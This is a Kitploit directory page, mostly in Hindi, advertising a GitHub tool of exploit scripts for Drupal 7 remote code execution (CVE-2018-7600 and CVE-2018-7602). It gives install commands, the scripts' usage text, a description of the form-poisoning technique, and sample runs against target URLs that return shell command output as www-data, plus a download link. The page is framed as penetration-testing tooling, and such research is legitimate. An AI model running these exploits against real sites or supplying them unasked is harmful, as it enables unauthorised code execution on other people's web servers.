Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-7600 — Drupal 7 <= 7.57 CVE-2018-7600 के लिए एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/pimps/cve-2018-7600
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubpimps/cve-2018-7600

CVE-2018-7600

Drupal 7 <= 7.57 CVE-2018-7600 के लिए एक्सप्लॉइट

रिपॉजिटरी देखें
141628 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Drupal 7 (CVE-2018-7600 / SA-CORE-2018-002)

आवश्यक लाइब्रेरीज़ को इस प्रकार स्थापित करें:

root@kitploit:~
pip install requests
pip install bs4
root@kitploit:~
$ python3 drupa7-CVE-2018-7600.py -h

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

usage: drupa7-CVE-2018-7600.py [-h] [-c COMMAND] [-f FUNCTION] [-p PROXY]
                               target

positional arguments:
  target                            लक्ष्य Drupal साइट का URL (जैसे:
                                    http://target.com/)

optional arguments:
  -h, --help                        यह सहायता संदेश दिखाएँ और बाहर निकलें
  -c COMMAND, --command COMMAND     निष्पादित करने के लिए कमांड (डिफ़ॉल्ट = id)
  -f FUNCTION, --function FUNCTION  आक्रमण वेक्टर के रूप में उपयोग करने के लिए फ़ंक्शन (डिफ़ॉल्ट
                                    = passthru)
  -p PROXY, --proxy PROXY           प्रॉक्सी को http://127.0.0.1:8080/ प्रारूप में कॉन्फ़िगर करें (डिफ़ॉल्ट = कोई नहीं)

यह स्क्रिप्ट Drupal 7 <= 7.57 में (CVE-2018-7600) भेद्यता का शोषण करेगी,
पासवर्ड पुनर्प्राप्ति फ़ॉर्म (user/password) को विषाक्त करके और ajax के माध्यम से फ़ाइल अपलोड (/file/ajax) के साथ इसे ट्रिगर करके।

root@kitploit:~

$ python3 drupa7-CVE-2018-7600.py http://target.local/

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] फ़ॉर्म को विषाक्त किया जा रहा है और इसे कैश में शामिल किया जा रहा है।
[*] विषाक्त फ़ॉर्म ID: form-xpkEuQSuJJJQ1y4Sfs8gs0zzsVdO_v_TpaJDBSehzJE
[*] निष्पादित करने के लिए शोषण ट्रिगर किया जा रहा है: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Drupal 7 (CVE-2018-7602 / SA-CORE-2018-004)

आवश्यक लाइब्रेरीज़ को इस प्रकार स्थापित करें:

root@kitploit:~
pip install requests
pip install bs4
root@kitploit:~
$ python3 drupa7-CVE-2018-7602.py -h

===================================================================================
|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |
|                                   by pimps                                      |
===================================================================================

usage: drupa7-CVE-2018-7602.py [-h] [-c COMMAND] [-f FUNCTION] [-x PROXY]
                               user password target

positional arguments:
  user                              उपयोगकर्ता नाम
  password                          पासवर्ड
  target                            लक्ष्य Drupal साइट का URL (जैसे:
                                    http://target.com/)

optional arguments:
  -h, --help                        यह सहायता संदेश दिखाएँ और बाहर निकलें
  -c COMMAND, --command COMMAND     निष्पादित करने के लिए कमांड (डिफ़ॉल्ट = id)
  -f FUNCTION, --function FUNCTION  आक्रमण वेक्टर के रूप में उपयोग करने के लिए फ़ंक्शन (डिफ़ॉल्ट
                                    = passthru)
  -x PROXY, --proxy PROXY           प्रॉक्सी को http://127.0.0.1:8080/ प्रारूप में कॉन्फ़िगर करें (डिफ़ॉल्ट = कोई नहीं)

यह स्क्रिप्ट Drupal 7 <= 7.58 में (CVE-2018-7602) भेद्यता का शोषण करेगी,
एक वैध खाते का उपयोग करके और खाता रद्द करने के फ़ॉर्म (user_cancel_confirm_form) को 'destination' चर के साथ विषाक्त करके
और ajax के माध्यम से फ़ाइल अपलोड (/file/ajax) के साथ इसे ट्रिगर करके।

root@kitploit:~

$ python3 drupa7-CVE-2018-7602.py marcio2 teste123 http://127.0.0.1:9090/

===================================================================================
|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |
|                                   by pimps                                      |
===================================================================================

[*] दिए गए क्रेडेंशियल का उपयोग करके एक सत्र बनाया जा रहा है...
[*] उपयोगकर्ता ID ढूंढा जा रहा है...
[*] उपयोगकर्ता ID मिली: user/4
[*] 'destination' का उपयोग करके फ़ॉर्म को विषाक्त किया जा रहा है और इसे कैश में शामिल किया जा रहा है।
[*] विषाक्त फ़ॉर्म ID: form-hKyeyIYxk-e4qT1sdZ6nWHq0xuHcH2BMWk3vMWaSExU
[*] निष्पादित करने के लिए शोषण ट्रिगर किया जा रहा है: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

टूल डाउनलोड करें